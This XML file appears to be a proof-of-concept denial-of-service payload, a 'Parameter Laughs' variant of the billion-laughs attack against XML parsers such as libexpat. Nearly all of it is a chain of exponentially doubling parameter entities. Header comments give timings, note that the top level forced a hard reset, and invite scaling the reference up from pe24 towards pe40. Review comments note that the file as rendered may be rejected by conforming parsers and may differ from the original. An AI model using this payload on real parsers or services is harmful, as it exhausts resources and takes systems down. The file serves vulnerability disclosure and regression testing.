| <?xml version="1.0"?> |
| <!-- |
| Copyright (C) 2020 Sebastian Pipping <sebastian@pipping.org> |
| v3.1 2020-06-21, not (yet) to be published |
| |
| "Parameter Laughs", i.e. variant of Billion Laughs Attack |
| using parameter entities the other way around |
| |
| Use of "%pe24;" below makes the XML processor (e.g. "xmlwf -p < file.xml" or |
| "xmllint file.xml > /dev/null") take 3 to 12 seconds on my machine. |
| Increase to "%pe25;" and beyond carefully: use of "%pe40;" makes my machine |
| need a hard reset. |
| |
| Note that, unlike libxml2, libexpat has no protection against billion |
| laughs attacks to this day, so this is not a new vulnerability in |
| libexpat. The upcoming release, libexpat 2.4.0, will have protection |
| against this family of attacks. |
| --> |
| <!DOCTYPE r [ |
| <!-- |
| Doubling chain of parameter entities. pe_1 is a single empty comment; each |
| later level is two copies of the previous level with one more empty comment |
| between them, so level N stands for 2^N - 1 empty comments once fully |
| expanded. The declarations stay a few dozen bytes each while the expanded |
| size doubles per level, so an input size limit does not bound the work; |
| the parser needs a limit on entity expansion (amplification) instead. |
| |
| NOTE(review): as rendered here, the entity values hold literal |
| parameter-entity references. XML 1.0 (WFC "PEs in Internal Subset") forbids |
| those inside markup declarations in the internal subset, so a conforming |
| parser may reject the file at pe_2. Presumably the upstream file writes the |
| percent sign as a character reference and this page decoded it; confirm |
| against the original before using this file as a regression input. |
| --> |
| <!ENTITY % pe_1 "<!---->"> |
| <!ENTITY % pe_2 "%pe_1;<!---->%pe_1;"> |
| <!ENTITY % pe_3 "%pe_2;<!---->%pe_2;"> |
| <!ENTITY % pe_4 "%pe_3;<!---->%pe_3;"> |
| <!ENTITY % pe_5 "%pe_4;<!---->%pe_4;"> |
| <!ENTITY % pe_6 "%pe_5;<!---->%pe_5;"> |
| <!ENTITY % pe_7 "%pe_6;<!---->%pe_6;"> |
| <!ENTITY % pe_8 "%pe_7;<!---->%pe_7;"> |
| <!ENTITY % pe_9 "%pe_8;<!---->%pe_8;"> |
| <!ENTITY % pe10 "%pe_9;<!---->%pe_9;"> |
| <!ENTITY % pe11 "%pe10;<!---->%pe10;"> |
| <!ENTITY % pe12 "%pe11;<!---->%pe11;"> |
| <!ENTITY % pe13 "%pe12;<!---->%pe12;"> |
| <!ENTITY % pe14 "%pe13;<!---->%pe13;"> |
| <!ENTITY % pe15 "%pe14;<!---->%pe14;"> |
| <!ENTITY % pe16 "%pe15;<!---->%pe15;"> |
| <!-- |
| pe17 is declared twice with identical text. Under XML 1.0 the first |
| declaration of an entity is binding, so the second one changes nothing; |
| a parser may at most emit a warning for it. |
| --> |
| <!ENTITY % pe17 "%pe16;<!---->%pe16;"> |
| <!ENTITY % pe17 "%pe16;<!---->%pe16;"> |
| <!ENTITY % pe18 "%pe17;<!---->%pe17;"> |
| <!ENTITY % pe19 "%pe18;<!---->%pe18;"> |
| <!ENTITY % pe20 "%pe19;<!---->%pe19;"> |
| <!ENTITY % pe21 "%pe20;<!---->%pe20;"> |
| <!ENTITY % pe22 "%pe21;<!---->%pe21;"> |
| <!ENTITY % pe23 "%pe22;<!---->%pe22;"> |
| <!ENTITY % pe24 "%pe23;<!---->%pe23;"> |
| <!ENTITY % pe25 "%pe24;<!---->%pe24;"> |
| <!ENTITY % pe26 "%pe25;<!---->%pe25;"> |
| <!ENTITY % pe27 "%pe26;<!---->%pe26;"> |
| <!ENTITY % pe28 "%pe27;<!---->%pe27;"> |
| <!ENTITY % pe29 "%pe28;<!---->%pe28;"> |
| <!ENTITY % pe30 "%pe29;<!---->%pe29;"> |
| <!ENTITY % pe31 "%pe30;<!---->%pe30;"> |
| <!ENTITY % pe32 "%pe31;<!---->%pe31;"> |
| <!ENTITY % pe33 "%pe32;<!---->%pe32;"> |
| <!ENTITY % pe34 "%pe33;<!---->%pe33;"> |
| <!ENTITY % pe35 "%pe34;<!---->%pe34;"> |
| <!ENTITY % pe36 "%pe35;<!---->%pe35;"> |
| <!ENTITY % pe37 "%pe36;<!---->%pe36;"> |
| <!ENTITY % pe38 "%pe37;<!---->%pe37;"> |
| <!ENTITY % pe39 "%pe38;<!---->%pe38;"> |
| <!ENTITY % pe40 "%pe39;<!---->%pe39;"> |
| <!-- |
| The line below is the only place where a chain entity is referenced at |
| declaration level. Levels pe25 through pe40 are declared above but are |
| not referenced from here. |
| --> |
| %pe24; <!-- not at full potential, increase towards "%pe40;" carefully --> |
| ]> |
| <!-- The root element is empty: the document body carries no content. --> |
| <r/> |